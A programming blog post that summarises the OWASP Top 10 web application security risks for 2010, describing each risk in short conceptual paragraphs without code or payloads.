There are lots of risks. This post summarizes top ten risks for the year 2010 identified by The Open Web Application Security Project (OWASP).
1. InjectionInjection flaws, such as SQL, OS, and LDAP injection, occur when untrusteddata is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
2. Cross-Site Scripting (XSS)Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.
3. Broken Authentication and Session ManagementApplication functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities.
4. Insecure Direct Object ReferencesA direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. An attacker can manipulate direct object references to access other objects without authorization, unless an access control check is in place.
5. Cross-Site Request Forgery (CSRF)Cross Site Request Forgery (also known as XSRF, CSRF, and Cross Site Reference Forgery) works by exploiting the trust that a site has for the user. Site tasks are usually linked to specific urls i.e. http://www.banksite.com/transfer.php?amount=100&account=12345) allowing specific actions to be performed when requested.
6. Security MisconfigurationGood security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date, including all code libraries used by the application.
7. Insecure Cryptographic StorageProtecting sensitive data with cryptography has become a key part of most web applications. Simply failing to encrypt sensitive data is very widespread. Applications that do encrypt frequently contain poorly designed cryptography, either using inappropriate ciphers or making serious mistakes using strong ciphers. These flaws can lead to disclosure of sensitive data and compliance violations.
8. Failure to Restrict URL AccessFrequently, the only protection for a URL is that links to that page are not presented to unauthorized users. However, a motivated, skilled, or just plain lucky attacker may be able to find and access these pages, invoke functions, and view data. Security by obscurity is not sufficient to protect sensitive functions and data in an application. Access control checks must be performed before a request to a sensitive function is granted, which ensures that the user is authorized to access that function.
9. Insufficient Transport Layer ProtectionInsufficient transport layer protection allows communication to be exposed to untrusted third-parties, providing an attack vector to compromise a web application and/or steal sensitive information. Websites typically use Secure Sockets Layer / Transport Layer Security (SSL/TLS) to provide encryption at the transport layer.
10. Unvalidated Redirects and ForwardsWeb applications frequently redirect and forward users to other pages and websites, and use untrusteddata to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.
Like What you See?Become one of the regulars by subscribing! You'll be the first to know when we add more great posts just like this. Join up by either RSS Feeds or Email Updates today!
There are No Comments to this post. You can follow any responses to this entry through the RSS 2.0 feed. You can skip to the end and leave a response
Leave a ReplyClick here to cancel reply.You must be logged in to post a comment.
News & UpdatesEnter your email address:CategoriesTutorialsC Programming TutorialsC++ Programming TutorialsC# Programming TutorialsObject Oriented ProgrammingMicrosoft Direct-X ProgrammingProgramming StylesData StructuresSource CodeC Programming Source CodeC++ Source CodeASPVisual Basic Source CodePHP Source CodeJavaJava ScriptBlogFree UtilitiesComputer BooksGeneral BooksProgramming BooksDatabasesWeb Design & DevelopmentComputer Science BooksCertification CentralGeneral SoftwareGraphics & IllustrationHardwareNetworking BooksFAQs Tutorial Categories TutorialsC Programming TutorialsC++ Programming TutorialsC# Programming TutorialsObject Oriented ProgrammingMicrosoft Direct-X ProgrammingProgramming StylesData StructuresSource CodeC Programming Source CodeC++ Source CodeASPVisual Basic Source CodePHP Source CodeJavaJava ScriptBlogFree UtilitiesComputer BooksGeneral BooksProgramming BooksDatabasesWeb Design & DevelopmentComputer Science BooksCertification CentralGeneral SoftwareGraphics & IllustrationHardwareNetworking BooksFAQs Popular Tags .NETAlgorithmsAppletArraysB-TreeBooksC#.NETC++ LibraryC++ ProgrammingCalculatorClassClassesC ProgrammingCSharpDatabaseData StructureDirectXExceptionFAQFAQsFile HandlingFunctionsGameGraphicsInheritanceJavaJavaScriptLoopsNetworkingObjectOpen SourceOverloadingPHP Source CodePointersPolymorphismProgrammingProgramming TipsSortingSource CodeStackStringsUtilitiesVisual Basic Source CodeWindowsWireless
Latest OffersThe Beginner's Guide to JoomlaA Newbie's Getting Started Guide to LinuxThe Incredible Guide to NEW Ubuntu (Karmic Koala)Software Common Hacks and Counterattacks - Best Practices Guide to Protecting Software Products against the Top 7 Piracy ThreatsThe ROI of Application Delivery Controllers in Traditional and Virtualized Environments Featured Posts Little known features of C/C++ 50 C++ Interview Questions Boycott FaceBook Recent Posts Little known features of C/C++ 50 C++ Interview Questions Boycott FaceBook An Introduction to C++ Sitemap Copyright Privacy Contact Profile RSS Feed Comments FeedDiscussion Feed
Niciun comentariu:
Trimiteți un comentariu